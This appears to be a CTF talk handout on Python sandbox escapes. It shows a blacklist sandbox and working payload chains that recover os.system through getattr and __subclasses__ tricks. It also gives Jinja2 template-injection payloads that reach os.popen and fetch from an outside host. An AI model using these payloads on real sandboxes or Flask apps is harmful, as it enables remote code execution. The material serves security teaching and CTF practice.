• @realgam3
• https://linkedin.com/in/realgam3
• https://github.com/realgam3
Objects
from __future__ import print_function
# Python 2 sandbox: blacklist approach, delete every builtin except raw_input and print
targets = __builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
    del __builtins__.__dict__[x]
banned = [
"import",
"exec",
"eval",
"pickle",
"os",
"subprocess",
"kevin sucks",
"input",
"banned",
"cry sum more",
"sys"
]
Links
• http://pyconil2018.realgame.co.il
• https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90-5-PySandbox.pdf
• https://github.com/vstinner/pysandbox
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html
If You Really Like CTF Challenges
My name is Tomer Zait and I'm a security researcher at F5 Networks.
I'm a practical software engineer and offensive security expert.
I love CTFs and writing open source software.
By the way, you are welcome to contribute code, or follow me on Twitter or GitHub.
Secure Pyshell:
print('')
print("")
print(".")
print(open)
print(__file__)
print(open(__file__))
print(getattr(open(__file__),"read"))
print(getattr(open(__file__),"read")())
print(__builtins__)
print(dir(__builtins__))
print(getattr(__builtins__,"vars"))
print(getattr(__builtins__,"va"+"rs"))
print(getattr(__builtins__,"va"+"rs")())
print(getattr(__builtins__,"va"+"rs")()["os"])
print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system"))
print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))
Zumbo 3:
{{1+1}}
{{request.environ}}
{{config}}
{%set a = 1+2%}{{a}}
{{config.__class__.__init__.__globals__}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{[].__class__.__base__.__subclasses__()}}
{{[].__class__.__base__.__subclasses__()[351]}}
{%25set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%25}{%25set r=c.request('GET', '/pysandbox.html')%25}{{c.getresponse().read()}}
http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool
https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask
print("".__class__.__mro__)
print("".__class__.__mro__[-1].__subclasses__())
print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage'))
print("".__class__.__mro__[-1].__subclasses__()[59].__init__)
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals)
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os'])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys']('whoami'))
Ask: “What are the actual alternatives that omer simpson has?”